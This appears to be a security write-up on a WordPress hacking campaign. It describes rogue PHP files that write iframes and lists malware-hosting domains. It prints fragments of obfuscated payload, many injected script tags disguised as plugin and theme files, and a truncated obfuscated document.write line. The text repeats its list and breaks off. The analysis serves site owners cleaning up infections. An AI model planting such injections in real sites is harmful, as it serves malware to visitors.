”YV+W3yJ88y87L0bM51T17udaiz”,”09Jl5yYDnZvYL/VAEe+g/VO5Wx”,”rK3d4P/EeIfPSqQvj8/4lCQi85?, ”ZFxbkL6FswEIWhbfY1QWqLpISU”,”Daoh8lTZSKtFEctKjTF25aWqZs”,”WvK8R5RqueV8iNUOH+CyxqSGVG”, ”lhH5W6lT+of5gLftw4JXKlUvjd”,”FRt65IPMFkMCh06mQ/5hay/oyW”,”R/Px/QlPxhhtmMhzf60cfr4v8I”, ”EC34WCPtXdpS/0JNNU3j63KAow”,”8Ldz6cLRPL7czLHi+9zfL9qPu1?,”i6PHH1ErH97j80fxy+ePH5Gs0z”, ”ZeT6py3X6/04U8HHmkbE78MhDn”,”9VASffpah4/LLvGfj/8PWGX41A”,”==”); echopreg_
I have only seen feedback from one site owner who indicated that the php code was placed in the file wp-includes/kses.php.
Malware hosted on adsa.fr.pn, holala02.in, adsa.cn.pn, piz04.edu.tf, adsa.co.at.pn and topddd14.in
I am seeing a number of WordPress sites hacked with a script call to a "rogue" php file over the last couple of days. The hacks have all been fairly similar. The hacker places a "rogue" php file on the site that, in most cases, has contained some obfuscated JavaScript, the writes an iframe which loads the malicious content. In one case the "rogue" file contained some obfuscated php code which wrote some obfuscated JavaScript which wrote the iframe. Next the hacker inserts a script call in all the index.php file(s) on the site to call the "rogue" php file. In most cases the script call was inserted at the end of the file just before the </body> tag but on one site it was towards the beginning of the file just after the <body> tag. Here are some of the paths/file-names I have seen used
<script type="text/javascript" src= "/wp-includes/js/tinymce/plugins/wplink/img/noosfera.php">
<script type="text/javascript" src="/wp-includes/js/tinymce/plugins/wpdialogs/js/input.php">
<script type="text/javascript" src="/wordpress/wp-content/plugins/nextgen-gallery/admin/js/colorpicker/js/graublau.php">
<script type="text/javascript" src="/wp-content/themes/choco/images/colors/LITBox.php">
<ems><script type˜="text/javascript" src="/tinymce/jscripts/tiny_mce/plugins/advimage/jscripts/qtp_library.php"></script></ems>
<dig><script type="text/javascript" src="/wp-content/plugins/growmap-anti-spambot-plugin/languages/horizmenu.php"> </script></dig>
<dig><script type="text/javascript" src="/wp-content/themes/metrolo/images/prettyPhoto/dark_rounded/index_jquery.php"></script></dig>
<ems><script type="text/javascript" src="/wp-includes/js/tinymce/plugins/spellchecker/checkuncheckboxes.php"></script></ems>
<ad><script type="text/javascript" src="/wp-content/themes/suitandtie/styles/gray/png.php"></script></ad>
<script type="text/javascript" src="/wp-includes/js/swfupload/plugins/laser.php">
<cits> <script type="text/javascript" src="/wp-includes/js/tinymce/themes/advanced/skins/o2k7/jquery.masonry.php"> </script></cits>
<script type="text/javascript" src="/wp-content/plugins/sitemap-generator/lang/page.php"></script>
<centr> <script type="text/javascript" src="/wp-content/element-beta-min.php"> </script> </centr>
<block> <script type="text/javascript" src="/wp-content/plugins/nextgen-gallery/admin/js/colorpicker/css/jquery-ui-accordion.min.php"> </ script> </block>
<script type="text/javascript" src="/wp-includes/js/tinymce/plugins/wpdialogs/js/input.php">
<script type="text/javascript" src="/wordpress/wp-content/plugins/nextgen-gallery/admin/js/colorpicker/js/graublau.php">
<script type="text/javascript" src="/wp-content/themes/choco/images/colors/LITBox.php">
<ems><script type˜="text/javascript" src="/tinymce/jscripts/tiny_mce/plugins/advimage/jscripts/qtp_library.php"></script></ems>
<dig><script type="text/javascript" src="/wp-content/plugins/growmap-anti-spambot-plugin/languages/horizmenu.php"> </script></dig>
<dig><script type="text/javascript" src="/wp-content/themes/metrolo/images/prettyPhoto/dark_rounded/index_jquery.php"></script></dig>
<ems><script type="text/javascript" src="/wp-includes/js/tinymce/plugins/spellchecker/checkuncheckboxes.php"></script></ems>
<ad><script type="text/javascript" src="/wp-content/themes/suitandtie/styles/gray/png.php"></script></ad>
<script type="text/javascript" src="/wp-includes/js/swfupload/plugins/laser.php">
<cits> <script type="text/javascript" src="/wp-includes/js/tinymce/themes/advanced/skins/o2k7/jquery.masonry.php"> </script></cits>
<script type="text/javascript" src="/wp-content/plugins/sitemap-generator/lang/page.php"></script>
<centr> <script type="text/javascript" src="/wp-content/element-beta-min.php"> </script> </centr>
<block> <script type="text/javascript" src="/wp-content/plugins/nextgen-gallery/admin/js/colorpicker/css/jquery-ui-accordion.min.php"> </ script> </block>
In some cases the script calls were enclosed in tags such as <ems></ems>, <ad></ad>, <dig></dig>, <cits></cits> and others not. The paths/file-names could be about anything and so far have been "tweaked" to fit the plugins/themes used on the site to help disguise them.
On some sites, not all, there is also a hack in 1 or more of the javascript files. For example on one site the script /wp-content/themes/
document.write("\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u002...........u0070\u0074\u003E");
If you view your Javascript files in the File Viewer it "SHOULD" de-obfuscate the line. The script wrote the line of code
